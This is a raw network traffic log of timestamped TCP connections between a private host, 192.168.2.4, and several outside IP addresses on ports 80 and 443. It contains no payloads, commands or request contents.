Dec 14, 2024 23:58:21.648221970 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.648269892 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.648343086 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.648387909 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.649424076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.649490118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.649512053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.649611950 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.653454065 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.653477907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.653640985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.653655052 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.653670073 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.653683901 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.653697968 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.653698921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.653731108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.653731108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.654519081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.654536009 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.654582977 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.654583931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.655904055 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.655919075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.655949116 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.655996084 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.656907082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.656963110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.657083988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.657186031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.658114910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.658129930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.658166885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.658198118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.659212112 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.659259081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.659399986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.659466982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.660156012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.660345078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.660355091 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.660384893 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.661350012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.661401033 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.661520004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.661578894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.662288904 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.662341118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.662609100 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.663165092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.663343906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.663404942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.663496971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.663569927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.664591074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.664648056 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.798643112 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.798702955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.798758030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.798813105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.799139023 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.799192905 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.799268961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.799367905 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.800246000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.800296068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.800334930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.800384998 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.801328897 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.801383018 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.801422119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.801474094 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:22.464422941 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:22.464679003 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:22.466316938 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:22.466371059 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:22.466829062 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:22.468626976 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:22.468626976 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:22.468800068 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:23.450869083 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:23.451092005 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:23.451164961 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:23.522039890 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:23.522041082 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:23.522104979 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:23.522138119 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:24.036833048 CET	49786	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:24.037012100 CET	49811	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:24.156805038 CET	80	49811	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:24.156970978 CET	80	49786	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:24.157052040 CET	49811	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:24.157211065 CET	49786	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:24.157840014 CET	49811	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:24.278223991 CET	80	49811	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:25.046035051 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:25.046123028 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:25.046212912 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:25.046644926 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:25.046717882 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:25.565258980 CET	80	49811	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:25.565495014 CET	49811	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:25.589576960 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:25.709486008 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:25.709609032 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:25.709729910 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:25.829549074 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:26.503247023 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:26.503381014 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:26.505009890 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:26.505064964 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:26.505584955 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:26.506848097 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:26.547406912 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.041604042 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.041698933 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.041735888 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.041923046 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.041923046 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.042344093 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.042377949 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.042412043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.042435884 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.042471886 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.043271065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.043306112 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.043366909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.043371916 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.043373108 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.043405056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.043453932 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.161959887 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.162018061 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.162182093 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.233827114 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.233921051 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.234013081 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.237927914 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.237999916 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.238061905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.238465071 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.246362925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.246432066 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.246550083 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.254272938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.254415035 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.254498005 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.262697935 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.262794018 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.262883902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.271133900 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.271207094 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.271286964 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.279494047 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.279612064 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.279692888 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.287856102 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.287965059 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.288037062 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.296220064 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.296371937 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.296462059 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.304637909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.304750919 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.304855108 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.313051939 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.313163996 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.313236952 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.353703022 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.353797913 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.369925022 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.369954109 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.370130062 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.370134115 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.370134115 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.370198011 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.370251894 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.370275021 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.426546097 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.426588058 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.426624060 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.426692009 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.428843021 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.428956032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.429008007 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.432678938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.432745934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.432811975 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.432877064 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.437686920 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.437751055 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.437813044 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.437866926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.442663908 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.442781925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.442840099 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.447638035 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.447710037 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.447777987 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.448227882 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.452477932 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.452539921 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.452606916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.452925920 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.458163023 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.458198071 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.458231926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.458295107 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.462517977 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.462552071 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.462593079 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.462626934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.467755079 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.467788935 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.467823029 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.467855930 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.472383976 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.472620010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.472688913 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.476655006 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.476707935 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.476716995 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.476769924 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.482002020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.482111931 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.482193947 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.482505083 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.486891031 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.486927032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.486963987 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.486996889 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.490885019 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.490957975 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.491070032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.491544008 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.494779110 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.494843960 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.494927883 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.497457027 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.499911070 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.499944925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.500010014 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.502145052 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.502213955 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.502253056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.502307892 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.506125927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.506186962 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.506243944 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.507282972 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.510093927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.510149002 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.594362974 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.594397068 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.594454050 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.594516993 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.594583035 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.594624043 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.594647884 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.600183010 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.600277901 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.606194019 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.606390953 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.606523991 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.606745005 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.606779099 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.606812000 CET	49812	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:27.606825113 CET	443	49812	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:27.624960899 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.625083923 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.625205994 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.626384020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.626501083 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.626605988 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.629306078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.629436970 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.629451990 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.632144928 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.632241964 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.632271051 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.633440971 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.635040045 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.635155916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.635207891 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.637855053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.637980938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.638037920 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.640686035 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.640774965 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.640793085 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.641462088 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.643505096 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.643605947 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.643665075 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.646250010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.646390915 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.646451950 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.649081945 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.649194002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.649255991 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.651879072 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.651993036 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.652050018 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.654687881 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.654789925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.654866934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.657474995 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.657609940 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.657670021 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.660288095 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.660370111 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.660412073 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.661461115 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.663088083 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.663208961 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.663283110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.665901899 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.666009903 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.666073084 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.668725967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.668837070 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.668912888 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.671519041 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.671664953 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.671739101 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.674331903 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.674459934 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.674516916 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.677135944 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.677232981 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.677261114 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.677292109 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.679914951 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.679970026 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.680016041 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.680387020 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.682739019 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.682878971 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.682929993 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.685537100 CET	80	49813	185.215.113.16	192.168.2.4
